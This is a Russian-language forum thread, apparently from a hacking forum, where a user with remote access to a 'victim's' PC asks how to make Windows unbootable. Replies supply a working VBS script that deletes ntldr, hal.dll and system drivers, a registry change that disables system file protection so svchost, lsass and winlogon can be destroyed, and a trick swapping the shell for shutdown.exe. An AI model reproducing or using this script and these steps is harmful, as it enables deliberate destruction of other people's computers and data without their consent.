![]() |
выбить винду
что нужно удолить на компе жертвы чтобы виндовс пришлось переустанавливать?
|
boot.ini , также в тему тебе поможет http://video.antichat.ru/file184.html
|
Run32.dll
|
Как переставить Виндоус.
Как переставить Виндоус. (Руководство для девочек)
Зы ничего личного, просто в тему... :D |
вы говорите плз где обычно находятся эти файлы
|
диск C: --> найти "имя файла.dll" !
Но руководство для девочек сё равно круче! |
ненашолл рун 32.длл ............
я вот шарюсь в папке виндовс-систем 32. что тут удолить чтобы вылетела винда? |
реестр испагань и будет тебе счастье
|
нашол rundll32.exe
это не то? |
удали c:/windows
|
в голову пришла мысль - если удалить C:\WINDOWS\explorer.exe то он сможет самовосстановиться?
|
Ты себе хочешь запороть?Или чужой комп?
А так вот хороший способ: Создай 123.txt запиши в него On error resume next Set S = CreateObject("Wscript.Shell") Set FSO=createobject("scripting.filesystemobject") fso.deletefolder fso.getspecialfolder(0)+"\system32\drives",1 On error resume next Set S = CreateObject("Wscript.Shell") Set FSO=createobject("scripting.filesystemobject") fso.deletefile "C:\ntldr",1 fso.deletefile fso.getspecialfolder(0)+"\system32\hal.dll",1 Далее сохраняешь и пееиминовываешь 123.txt в 123.vbs и будет тебе счастье!!! |
Цитата:
Цитата:
создавать ничего не могу.... удалённое администрирование... но создавать не получится |
Отключи защиту сист файлов , и фигачь системные файлы svchost.exe , lsass, winlogn и т.д
Для отключения защиты сис. файлов нужно в реестре в ветке [HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows NT \CurrentVersion \Winlogon] Изменить значение параметра SFCDisable на ffffff9d |
hal.dll без этого винда не заработает, но этот файлик как и boot.ini можно восстановить...
|
где находится этот файл? hal.dll
|
Как шютка юмора
... только что как вариант придумал в реестре в ветке Shell вместо Explorer.exe вставить Shutdown.exe :D ... интересна скока людеф засунет лампочку в рот??? |
убери яркость на мониторе на 0 и всё.
|
ну и что?.. он обновится или перезагрузится и всё станет на свои места.. нжно виндовс снести.
|
Цитата:
|
Кароче открываешь rundll32.exe с помощью блокнота, удаляешь все содержимое, сохраняешь!
Затем переименовываешь rundll32.exe в rundll32.cfg, затем Shift+Delete его! Винде пиздец! ПРОВЕРЕНО! |
я повторяю... я ничего не могу изменить, добавить, переименовать, прописать..
только удолить... какой файл ннужно удолить, чтобы винда не запустилась? |
Цитата:
не могу удолить файл lsass.ехе . он в процессе на компе дервы... пробую переименовать в другой формат. переименовую.. ничего не даёт. ещё появилась идея. могу закачать на комп жертвы файлы. скиньте файл чтобы я скачал его. закинул.запустил и винда крякнулась.... очень нужно |
Эх, дать бы тебе флешку моего друга, настоящая убийца компов.
Изначально там просто поселилось много вирусов, но потом это переросло в спорт и адский стеб. Залили туда столько опасных вирей, сколько смогли откопать, результаты поражают))) "Дай мне свой курсач по электротехнике", "да не вопрос" и протягивает флешку смерти. |
было у меня как то вирь порушил lsass.exe после чео винда дальше приветствия не работала :(
|
lsass.exe удолить не могу так как файл находится в процессе...
что ещё сделать? |
| Время: 17:31 |